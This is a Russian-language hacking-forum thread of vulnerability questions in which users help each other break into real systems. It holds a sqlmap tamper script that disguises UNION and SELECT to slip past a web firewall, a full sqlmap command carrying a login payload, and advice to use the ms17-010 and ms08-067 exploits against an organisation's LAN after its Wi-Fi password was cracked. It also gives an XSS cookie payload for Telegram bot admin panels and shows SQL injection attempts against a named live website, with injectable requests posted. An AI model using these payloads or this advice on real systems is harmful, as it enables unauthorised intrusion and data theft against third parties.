Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Руками надо смотреть на что ругается ВАФ и потом уже искать обход.
    Почитай и попробуй варианты
    https://hydrasky.com/network-security/sql-injection-bypass-cheatsheet/
    http://www.securityidiots.com/Web-Pentest/WAF-Bypass/waf-bypass-guide-part-1.html
    https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3
     
    AngelEyes likes this.
  2. highmoore

    highmoore New Member

    Joined:
    4 Dec 2017
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Прошу помощи в раскрутке скули
    Что есть? Сайт написанный на Coldfusion, юнион и булеан типы, скуля в гет параметре
    Кручу мапом, мап видит булеан, через ордер бай понимает что есть и юнион, видит что там 3 колонки и натыкается на ваф
    Ругается на слово union, select пропускает
    Мап не может определить даже тип субд из-за того что ваф не пропускает его дальше
    Ошибка вафа :
    You are not permitted to run URL SQL Statements on this server. Your IP address has been logged and e-mailed to our administrator.
    Пробовал юрл энкод, двойной юрл энкод, почти все тамперы которые хоть как-то могли помочь
     
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Пробуй обойти ваф руками, потом пиши свой тампер на этот ваф, вот как пример

    #!/usr/bin/env python

    """
    Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
    See the file 'doc/COPYING' for copying permission
    """

    from lib.core.enums import PRIORITY

    __priority__ = PRIORITY.HIGHEST

    def dependencies():
    pass

    def tamper(payload, **kwargs):
    """
    ........

    """

    if payload:
    payload = payload.replace("INFORMATION_SCHEMA.TABLES", "/*!12345%49NFORMATION_SCHEMA.TABLES*/")
    payload = payload.replace("table_schema", "/*!12345%74able_schema*/")
    payload = payload.replace("table_name", "/*!12345%74able_name*/")
    payload = payload.replace("UNION", "/*!12345%75NION*/")
    payload = payload.replace("SELECT", "/*!12345%73ELECT*/")
    payload = payload.replace("SCHEMA", "%73CHEMA")
    payload = payload.replace("schema", "%73chema")
    payload = payload.replace("from", "/*!12345from*/")

    return payload
    дальше кладешь в папочку tamper/my_tamper.py и вызываешь --tamper="my_tamper"
     
    _________________________
    erbolg likes this.
  4. highmoore

    highmoore New Member

    Joined:
    4 Dec 2017
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Да, это все я понимаю, дело в том, что я руками не могу, все варианты провалились, это MSSQL как оказалось
    С которым у меня не так много опыта, буду благодарен за любую помощь
     
  5. SovaGSN

    SovaGSN New Member

    Joined:
    4 Aug 2019
    Messages:
    85
    Likes Received:
    1
    Reputations:
    0
    Всем доброго вечера! Подскажите, подобрал пароль к wi-fi роутеру организации, видно локальную сеть из 5 устройств и одного принтера. Компы на винде 7. Есть ли возможность проникнуть в расшаренные папки? ибо при попытке захода на удаленный комп внутри ЛВС требуется пароль и логин. Пароль требует только к компу админа, а остальные компы видны только как медиапроигрыватели
     
  6. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    попробуй заюзать эксплоиты ms17-010, ms08-67, очень сомневаюсь что там винда пропатчена
     
    _________________________
  7. AngelEyes

    AngelEyes New Member

    Joined:
    20 Jun 2019
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    sqlmap.py -u "https://******/client/login" -p "email" --risk="3" --level="3" --method="POST" --data="--3e306551ffbd4492975ea8cd2a9917cc
    Content-Disposition: form-data; name=%22email%22

    test
    --3e306551ffbd4492975ea8cd2a9917cc
    Content-Disposition: form-data; name=%22password%22

    N3tsp@rker-
    --3e306551ffbd4492975ea8cd2a9917cc
    Content-Disposition: form-data; name=%22action%22

    login
    --3e306551ffbd4492975ea8cd2a9917cc
    Content-Disposition: form-data; name=%22submit%22

    Sign In
    --3e306551ffbd4492975ea8cd2a9917cc
    Content-Disposition: form-data; name=%22hash%22

    3a4bf5ec9dcc971c08509bf8f5ca5cf1daac489a
    --3e306551ffbd4492975ea8cd2a9917cc--
    " --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36" --headers="Accept:application/json, text/javascript, */*; q=0.01\nContent-Type:multipart/form-data; boundary=----WebKitFormBoundaryOln7Ytw9vsNImdiP\nOrigin:https://*****\nX-Requested-With:XMLHttpRequest\nReferer:https://****/terms" --dbms="MySQL" --batch
    Подскажите как это всё в мапу упаковать?Сама мапа не находит уяз на сайте,пришлось спаркером воспользоваться,команда выдает то,что выше,но мапа так это не хавает
     
  8. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    положи весь запрос в файлик и обратись к нему через параметр -r file.txt
     
    _________________________
    AngelEyes likes this.
  9. M.Billar

    M.Billar Member

    Joined:
    24 Jul 2013
    Messages:
    84
    Likes Received:
    65
    Reputations:
    0
    Вот скажите, является ли уязвимостью тот факт, что в телеграм БОТах с админками вполне сносно работает XSS если указывать банальный код в имя-фамилию пользователя.
    Большая часть админок, не фильтрует эти данные и выходит, что можно просто написать Имя: <script>alert(document.cookie)</script>
    Зайти в бота, и в админке вуаля

    [​IMG]

    Бага это сервиса или разработчиков, которых даже не предупреждают о таких "возможностях" ?)
     
  10. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Да, является, с толковым подходом тут много что можно реализовать, на примере того же BEEF https://cryptoworld.su/beef-framework/, также в зависимости от того, как устроена/прописана админка, возможно воздействовать на функционал, опять же на примере XSS to RCE в wordpress или прочих CMS
     
    _________________________
    M.Billar and erwerr2321 like this.
  11. M.Billar

    M.Billar Member

    Joined:
    24 Jul 2013
    Messages:
    84
    Likes Received:
    65
    Reputations:
    0
    [​IMG]


    Печально обстоят дела с телегой... Ну вот что им стоит поднять задницу и профиксить это на выводе к ботам напр? А так, ходи, тр***й всех вокруг - им пофиг.
     
  12. highmoore

    highmoore New Member

    Joined:
    4 Dec 2017
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Простите за дубль, но все так же в поисках решения
     
  13. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    25
    Reputations:
    10
    Кидай в лс, раскрутим ее. Помогу чем смогу
     
  14. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    POST draw=4&columns[0][data]= ' &columns[0][name]=Smith&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=3&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=Smith&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=3&columns[1][search][regex]=false&columns[2][data]=2&columns[2][name]=Smith&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=3&columns[2][search][regex]=false&columns[3][data]=3&columns[3][name]=Smith&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=3&columns[3][search][regex]=false&columns[4][data]=4&columns[4][name]=Smith&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=3&columns[4][search][regex]=false&start=3&length=25&search[value]=3&search[regex]=false

    A Database Error Occurred
    Error Number: 1064

    You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'LIKE '%3%' OR LIKE '%3%' ) ORDER BY `date` DESC LIMIT 3, 100' at line 4

    SELECT `email`, `date` FROM `login` WHERE `referral` = '[email protected]' AND ( LIKE '%3%' OR LIKE '%3%' ) ORDER BY `date` DESC LIMIT 3, 100

    Filename: libraries/Datatables.php

    Line Number: 354

    крутиться вообще никак не хочет может кто подскажет что
    sqlmap тоже не берёт
     
  15. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    вижу 2 колонки, а остальное не понятно. columns[0][data]= ' я так понял тут инжектите? А до ваших манипуляций там какие были данные? Если `date` это columns[0][data] тогда у вас иньекция в начале запроса:
    Code:
    SELECT `email`, `ТУТ_СКУЛЯ` FROM `login` WHERE `referral` = '[email protected]' AND ( LIKE '%3%' OR LIKE '%3%' ) ORDER BY `date` DESC LIMIT 3, 100
    в таком случае вам нужно чтоб не нарушать запрос вывести 2 колонки и отбросить остальное комментарием кода.
    Либо внедрить свой код так чтоб не нарушить оставшийся запрос, по типу:
    columns[0][data]=(select version())
    а еще не понятно почему ругается на LIKE и почему там нет AND если инжект в реферале.
     
    #2675 b3, 21 Aug 2019
    Last edited: 21 Aug 2019
  16. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    ахахах нубас, рассмешил :) посмотри еще раз на запрос, истина где-то рядом! ;)
     
  17. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Лайтик :love: там нет инъекции.
    п.с я чет не понял юмора
    ( LIKE '%3%' OR LIKE '%3%' )
     
  18. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    Да не хотит крутится сайт https:/_/naira2usd.com/myreferralsx POST draw=6&columns[0][data]='&columns[0][name]=Smith&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=3&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=Smith&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=3&columns[1][search][regex]=false&start=3&length=100&search[value]=3&search[regex]=false
    может у кого получится
     
  19. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Не хотит наверное потому что там ее нету скорее всего, ну я покрайнемере ничего необычного не увидел))
    В другом месте потенциальная есть
    Code:
    https://naira2usd.com/confirmx
    POST
    draw=2&columns[0][data]=&columns[0][name]=&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=&columns[1][search][regex]=false&columns[2][data]=2&columns[2][name]=&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=&columns[2][search][regex]=false&columns[3][data]=3&columns[3][name]=&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=&columns[3][search][regex]=false&columns[4][data]=4&columns[4][name]=&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=&columns[4][search][regex]=false&start=0&length=100&search[value]='&search[regex]=false
    
     
    #2679 karkajoi, 21 Aug 2019
    Last edited: 21 Aug 2019
  20. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Обходить X-Requested-With можно только через .swf?